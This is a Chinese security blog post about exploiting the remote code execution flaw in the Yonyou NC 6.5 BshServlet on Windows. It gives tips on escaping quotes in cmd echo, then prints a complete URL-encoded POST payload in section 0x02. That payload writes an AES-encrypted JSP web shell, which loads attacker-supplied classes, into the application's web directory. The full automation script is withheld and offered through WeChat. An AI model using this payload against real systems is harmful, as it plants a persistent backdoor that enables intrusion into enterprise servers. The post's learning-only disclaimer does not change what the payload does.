用友NC BshServlet Echo Shell Tips 与 EXP on Windows

  • A+
所属分类:安全文章

用友NC BshServlet Echo Shell Tips 与 EXP on Windows



△△△点击上方“蓝字”关注我们了解更多精彩




目录结构


0x00 前言/简介

0x01 写shell的小Tips

0x02 最重要的POST数据包

0x03 自动化利用EXP

0x04 总结


0x00 Preface [前言/简介]

多次遇到了NC6.5 bsh.servlet.BshServlet RCE漏洞需求,手动调试发现Shell写起来很费时间。

经过摸鱼N久的功夫,最终成功写入shell,如此便能够输出一个可用的Windows Echo Shell的EXP。




0x01 写shell的小Tips

写shell的过程中有转义问题,开始一直在硬刚。
在当我使用双引号引用内容时不需要转义,但是会导致数据被引号引起,无法解析。
exec(cmd /c echo "shell-code" > shell.jsp);
shell.jsp: "shell-code"
最终换了一个小思路,把多余的引号闭合到代码之外
exec(cmd /c echo ">shell-code<" > shell.jsp);
shell.jsp内容: ">shell-code<





0x02 最重要的POST数据包

"bsh.script=exec%28%22cmd+%2Fc+echo+%5C%22%3E%3C%25%40page+import%3D%5C%22java.util.*%2Cjavax.crypto.*%2Cjavax.crypto.spec.*%5C%22%25%3E%3C%25%21class+U+extends+ClassLoader%7BU%28ClassLoader+c%29%7Bsuper%28c%29%3B%7Dpublic+Class+g%28byte+%5B%5Db%29%7Breturn+super.defineClass%28b%2C0%2Cb.length%29%3B%7D%7D%25%3E%3C%25if+%28request.getMethod%28%29.equals%28%5C%22POST%5C%22%29%29%7BString+k%3D%5C%22e45e329feb5d925b%5C%22%3Bsession.putValue%28%5C%22u%5C%22%2Ck%29%3BCipher+c%3DCipher.getInstance%28%5C%22AES%5C%22%29%3Bc.init%282%2Cnew+SecretKeySpec%28k.getBytes%28%29%2C%5C%22AES%5C%22%29%29%3Bnew+U%28this.getClass%28%29.getClassLoader%28%29%29.g%28c.doFinal%28new+sun.misc.BASE64Decoder%28%29.decodeBuffer%28request.getReader%28%29.readLine%28%29%29%29%29.newInstance%28%29.equals%28pageContext%29%3B%7D%25%3E%3C%5C%22+%3E+webapps%2Fnc_web%2Fshell.jsp%22%29%3B%0D%0A%0D%0A%0D%0A"





0x03 自动化利用EXP

用友NC BshServlet Echo Shell Tips 与 EXP on Windows


用友NC BshServlet Echo Shell Tips 与 EXP on Windows


用友NC BshServlet Echo Shell Tips 与 EXP on Windows


写入失败时,请查看报错情况。




0x04总结
由于某些原因,本次的EXP代码不直接提供。

有需要的读者可通过以下方式获取:
1、添加文末NOVASEC运营微信
2、NOVASEC公众号后台回复【共享】。

(PS:时间比较紧促,后台上传需要等待。)

被喷了,不开心。

END



如您有任何投稿、问题、建议、需求、合作、后台留言NOVASEC公众号!

用友NC BshServlet Echo Shell Tips 与 EXP on Windows

或添加NOVASEC-MOYU 以便于及时回复。

用友NC BshServlet Echo Shell Tips 与 EXP on Windows


感谢大哥们的对NOVASEC的支持点赞和关注

加入我们与萌新一起成长吧!


本团队任何技术及文件仅用于学习分享,请勿用于任何违法活动,感谢大家的支持!



本文始发于微信公众号(NOVASEC):用友NC BshServlet Echo Shell Tips 与 EXP on Windows

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: